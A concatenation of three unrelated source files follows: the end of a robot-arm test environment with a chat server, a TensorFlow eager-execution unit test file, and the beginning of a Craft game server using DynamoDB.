self._low_level_queue.put(data.decode("utf-8", "ignore").rstrip("\x00"))
def _process_low_level_instr(self) -> None:
"""Handles a low-level instruction.
If a low-level instruction is present in the queue, pop if off, include
it in the observation, and send an annotation for it.
"""
low_level_instr: Optional[str] = None
try:
low_level_instr = self._low_level_queue.get_nowait()
except queue.Empty:
pass
if low_level_instr is not None:
if low_level_instr and ord(low_level_instr[0]) == 3: # ctrl-C
self._chat_client_indicated_end = True
return
self._low_level_instruction.set(low_level_instr)
self._annotate_short_horizon_instr(low_level_instr)
def _end_test_case(self, reward: float, reset: bool) -> StepReturn:
"""Runs cleanup after a test case is done.
The task is stopped, the arm is moved up and out of the way, the chat
server is stopped (if still running), the end of the test case is annotated,
and 'done' is set based on whether we need to run another test case or not.
Args:
reward: The reward to give to the agent.
reset: Whether we are ending the test case due to a reset.
Returns:
A StepReturn tuple.
"""
# Annotate the end of the test case (if this isn't total reset).
if not reset:
observation, _, _, info = self._annotate_end_of_test_case()
else:
observation, _, _, info = self._super_step({})
observation = cast(Dict[str, Any], observation)
# Move the arm up and out of the way:
# Get the current pose, set the z-height to the safe z-height, and
# synchronously move.
pose = observation["arm"]["pose"]
pose[2] = SAFE_Z_METERS
pose[3:] = TOOL_ORIENTATION_RADS
self._go_to(pose, preemptive=True)
# Move the arm to one corner.
pose[0] = CORNER_X_METERS
pose[1] = CORNER_Y_METERS
self._go_to(pose)
# Shut down the chat server if started.
if self._chat_server is not None:
self._chat_server.stop()
self._chat_server = None
observation, _, _, info = self._stop_task()
# Any more long-horizon instructions?
if self._instr_num == NUM_TEST_CASES:
return (observation, reward, True, info)
# Ignore what the agent wanted to do prior to done.
observation, _, _, info = self._super_step({})
return (observation, reward, False, info)
def _start_test_case(self, reward: float, info: Any) -> StepReturn:
"""Runs setup for a new test case.
Effectively suspends the agent until the blocks are placed in
their initial state. When the human is ready to go, issue the
long-horizon instruction.
The arm is moved up and out of the way first.
Args:
reward: The reward to give to the agent.
info: Any info to be passed to the agent.
Returns:
A StepReturn tuple.
"""
# See where the arm currently is.
observation, _, _, _ = self._super_step({})
observation = cast(Dict[str, Any], observation)
# Get the long-horizon instruction to work on.
instr = self._long_horizon_instructions[self._instr_num].instruction
# print(f"{time.time()}: Long-horizon instruction: {instr}")
# Start a chat server and await a connection.
self._chat_server = ChatServer(instr, self._notify_low_level_instr)
self._start_task()
# Drop the arm close to the table.
pose = observation["arm"]["pose"]
pose[2] = PUSH_Z_METERS
pose[3:] = TOOL_ORIENTATION_RADS
self._go_to(pose)
# Set the starting time for this test case.
self._test_case_begin_ts = time.time()
self._annotate_start_of_test_case()
self._annotate_long_horizon_instr(instr)
# Set the long-horizon instruction and clear the low-level queue.
self._high_level_instruction.set(instr)
self._low_level_instruction.set("")
while not self._low_level_queue.empty():
try:
_ = self._low_level_queue.get_nowait()
except queue.Empty:
pass
# Ignore what the agent wanted to do prior to setup.
observation, reward, done, info = self._super_step({})
# Start the timer running.
self._timer_running = True
self._deadline = time.time() + TIMEOUT_PER_TASK_SECONDS
self._setup_state = SetupState.ATTEMPTING_INSTRUCTION
return (observation, reward, done, info)
def _start_task(self) -> StepReturn:
"""Starts a task."""
task_action = collections.OrderedDict(
{"task": collections.OrderedDict(
{"action": ReachTaskAction.START})})
return self._super_step(task_action)
def _stop_task(self) -> StepReturn:
"""Stops a task."""
task_action = collections.OrderedDict(
{"task": collections.OrderedDict(
{"action": ReachTaskAction.STOP})})
return self._super_step(task_action)
def _annotate_long_horizon_instr(self, instr: str) -> StepReturn:
"""Sends an annotation for a long-horizon instruction.
The instruction is stripped of null bytes at the end, in case
there were any.
Args:
instr: The instruction to put in the annotation.
Returns:
A StepReturn tuple.
"""
annotation = logs_pb2.ClientAnnotation()
annotation.long_horizon_instruction.text = instr.rstrip("\x00")
return self._annotate(annotation)
def _annotate_short_horizon_instr(self, instr: str) -> StepReturn:
"""Sends an annotation for a short-horizon instruction.
The instruction is stripped of null bytes at the end, in case
there were any.
Args:
instr: The instruction to put in the annotation.
Returns:
A StepReturn tuple.
"""
annotation = logs_pb2.ClientAnnotation()
annotation.short_horizon_instruction.text = instr.rstrip("\x00")
return self._annotate(annotation)
def _annotate_start_of_test_case(self) -> StepReturn:
"""Sends an annotation for the start of the test case."""
annotation = logs_pb2.ClientAnnotation()
self._set_proto_timestamp(annotation.point_measurement.timestamp,
time.time())
annotation.point_measurement.space = ENV_ID
annotation.point_measurement.name = "test_case_begin_ts"
annotation.point_measurement.value.seconds = self._test_case_begin_ts
return self._annotate(annotation)
def _annotate_end_of_test_case(self) -> StepReturn:
"""Sends an annotation for the end of the test case.
Defined as when the arm moves out of the way, so that the
most recent image can show the board unoccluded.
Returns:
A StepReturn tuple.
"""
t = time.time() - self._test_case_begin_ts
annotation = logs_pb2.ClientAnnotation()
self._set_proto_timestamp(annotation.point_measurement.timestamp,
time.time())
annotation.point_measurement.space = ENV_ID
annotation.point_measurement.name = "test_case_time"
annotation.point_measurement.value.seconds = t
return self._annotate(annotation)
def _annotate(self, proto: logs_pb2.ClientAnnotation) -> StepReturn:
"""Sends an annotation using an action."""
self._set_proto_timestamp(proto.associated_server_ts, self._last_server_ts)
annotation_size = self.action_space["annotation"]["data"].shape[0]
bs = proto.SerializeToString()
enc = annotation_size * [256]
enc[:len(bs)] = bs
enc_ndarray = np.array(enc, dtype=np.int)
action = {
"annotation": {
"disable": 0,
"data": enc_ndarray
}
}
return self._super_step(action)
def _set_proto_timestamp(self, ts: timestamp_pb2.Timestamp,
t: float) -> None:
"""Sets the timestamp in a proto."""
ts.seconds = int(t)
ts.nanos = int((t % 1) * 1e9)
def _go_to(self, pose: List[float], preemptive: bool = False) -> StepReturn:
"""Moves the arm synchronously to the given pose."""
action = collections.OrderedDict({
"arm":
collections.OrderedDict({
"command": 2,
"pose": pose,
"synchronous": 1,
"use_linear": 1,
"velocity": 0.7,
"preemptive": 1 if preemptive else 0,
})
})
return self._super_step(action)
def _go_to_joints(self, joints: List[float]) -> StepReturn:
"""Moves the arm synchronously to the given joint angles."""
action = collections.OrderedDict({
"arm":
collections.OrderedDict({
"command": 1,
"joint_angles": np.array(joints),
"synchronous": 1,
"use_linear": 1,
"velocity": 0.5,
})
})
return self._super_step(action)
def main(_: Any) -> None:
if flags.FLAGS.instructor:
ChatClient()
if __name__ == "__main__":
flags.DEFINE_bool("instructor", False, "Run as the instructor.")
app.run(main)
|
core_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tensorflow
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
class TFETest(test_util.TensorFlowTestCase):
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.ASYNC)
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
with ctx.execution_mode(context.ASYNC):
self.assertEqual(context.ASYNC, ctx.get_execution_mode())
ctx.set_execution_mode(context.SYNC)
self.assertEqual(context.SYNC, ctx.get_execution_mode())
self.assertIsNone(ctx.summary_writer_resource)
ctx.summary_writer_resource = 'mock'
self.assertEqual('mock', ctx.summary_writer_resource)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testRunMetadata(self):
context.enable_run_metadata()
t = constant_op.constant(1.0)
_ = t + t # Runs an operation which will be in the RunMetadata
run_metadata = context.export_run_metadata()
context.disable_run_metadata()
step_stats = run_metadata.step_stats
self.assertGreater(len(step_stats.dev_stats), 0)
cpu_stats = step_stats.dev_stats[0]
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
cpu_stats.device)
self.assertGreaterEqual(len(cpu_stats.node_stats), 1)
def testShouldCopy(self):
if not context.context().num_gpus():
self.skipTest('No devices other than CPUs found')
with ops.device('gpu:0'):
x = constant_op.constant(1.0)
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
def testInt32GPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
t = threading.Thread(target=target, args=args)
try:
t.start()
t.join()
except Exception as e:
raise e
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(), ctx.scope_name, ctx.summary_writer_resource,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
def testContextConfig(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEquals(0, ctx.num_gpus())
def testTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
def testResourceTensorPlacement(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
def testCopyBetweenDevices(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
def testCopyBetweenDevicesAsync(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.async_wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.async_wait()
context.async_clear_error()
def testCopyScope(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.context().device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
def testNumpyForceCPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(str)
pywrap_tensorflow.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
context.set_execution_mode(context.ASYNC)
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))
context.async_wait()
context.async_clear_error()
context.set_execution_mode(context.SYNC)
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
def testMatMulGPU(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3]]),
constant_op.constant([[5]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', 1, 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEquals(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
def testOperationWithNoInputsRunsOnDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEquals(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
def testLocalCrossDevice(self):
if not context.context().num_gpus():
self.skipTest('No GPUs found')
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = constant_op.constant(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
if __name__ == '__main__':
test.main()
|
server-ddb.py
|
from math import floor
from world import World
import Queue
import SocketServer
import datetime
import random
import re
import requests
import sqlite3
import sys
import threading
import time
import traceback
import boto3
from botocore.exceptions import ClientError
dynamodb_client = boto3.client("dynamodb", region_name="us-west-2")
def create_ddb_get_block_type(p,q,x,y,z):
#select w from block where p = :p and q = :q and x = :x and y = :y and z = :z;'
return {
"TableName": "GameState",
"KeyConditionExpression": "#11b31 = :11b31 And begins_with(#11b32, :11b32)",
"ProjectionExpression": "#11b30",
"ExpressionAttributeNames": {"#11b30":"type","#11b31":"PK","#11b32":"SK"},
"ExpressionAttributeValues": {":11b31": {"S":"block"},":11b32": {"S":p+q+x+y+z}}
}
def create_ddb_get_block_rowid(p,q,key):
#select rowid, x, y, z, w from block where p = :p and q = :q and rowid > :key;
return {
"Statement": "select rowid,x,y,z,w from GameState where PK='Block' and SK="+p+q+key
}
def create_ddb_get_light(p,q):
#select x, y, z, w from light where p = :p and q = :q;
return {
"TableName": "GameState",
"KeyConditionExpression": "#4f421 = :4f421 And begins_with(#4f422, :4f422)",
"ProjectionExpression": "#4f420",
"ExpressionAttributeNames": {"#4f420":"light","#4f421":"PK","#4f422":"SK"},
"ExpressionAttributeValues": {":4f421": {"S":"light"},":4f422": {"S":p+q}}
}
def create_ddb_get_sign(p,q):
#select x, y, z, face, text from sign where p = :p and q = :q;
return {
"TableName": "GameState",
"KeyConditionExpression": "#1ec11 = :1ec11 And begins_with(#1ec12, :1ec12)",
"ProjectionExpression": "#1ec10",
"ExpressionAttributeNames": {"#1ec10":"sign","#1ec11":"PK","#1ec12":"SK"},
"ExpressionAttributeValues": {":1ec11": {"S":"sign"},":1ec12": {"S":p+q}}
}
def create_ddb_put_item(_type,p,q,w,x,y,z):
return {
"TableName": "GameState",
"Item": {
"PK": {"S":_type},
"SK": {"S":p+q+x+y+z+w},
"position": {"S":x+y+z},
"type": {"S":w},
"chunk": {"S":p+q},
"block": {"M": {"p": {"N":p},"q": {"N":q},"w": {"N":w},"x": {"N":x},"y": {"N":y},"z": {"N":z}}}
}
}
def execute_query(dynamodb_client, input):
try:
response = dynamodb_client.query(**input)
log("Query successful.",response)
# Handle response
return response
except ClientError as error:
handle_error(error)
except BaseException as error:
log("Unknown error while querying: " + error.response['Error']['Message'])
def create_ddb_sign_put_item(_type,p,q,x,y,z,face,text):
return {
"TableName": "GameState",
"Item": {
"PK": {"S":_type},
"SK": {"S":p+q+x+y+z+face+text},
"chunk": {"S":p+q},
"sign_position": {"S":x+y+z},
"sign_face": {"S":x+y+z+face},
"sign": {"M": {"face": {"N":face},"p": {"N":p},"q": {"N":q},"text": {"N":text},"x": {"N":x},"y": {"N":y},"z": {"N":z}}}
}
}
def execute_ddb_put_item(dynamodb_client, input):
try:
log("INFO execute_ddb_put_item {}".format(input))
response = dynamodb_client.put_item(**input)
log("INFO execute_ddb_put_item Successfully put item.")
except Exception as error:
log("ERROR execute_ddb_put_item {}".format(error))
def execute_ddb_get_item(dynamodb_client, input):
try:
log("INFO execute_ddb_get_item {}".format(input))
response = dynamodb_client.execute_statement(**input)
log("INFO execute_ddb_get_item Successfully get item. response=".format(response))
return response
except Exception as error:
log("ERROR execute_ddb_get_item {}".format(error))
def execute_ddb_query(dynamodb_client, input):
try:
log("INFO execute_ddb_query {}".format(input))
response = dynamodb_client.query(**input)
log("INFO execute_ddb_query Query Successful. response=".format(response))
return response
except Exception as error:
log("ERROR execute_ddb_query {}".format(error))
DEFAULT_HOST = '0.0.0.0'
DEFAULT_PORT = 4080
DB_PATH = 'craft.db'
LOG_PATH = 'log.txt'
CHUNK_SIZE = 32
BUFFER_SIZE = 4096
COMMIT_INTERVAL = 5
AUTH_REQUIRED = False
AUTH_URL = 'https://craft.michaelfogleman.com/api/1/access'
DAY_LENGTH = 600
SPAWN_POINT = (0, 0, 0, 0, 0)
RATE_LIMIT = False
RECORD_HISTORY = False
INDESTRUCTIBLE_ITEMS = set([16])
ALLOWED_ITEMS = set([
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15,
17, 18, 19, 20, 21, 22, 23,
32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47,
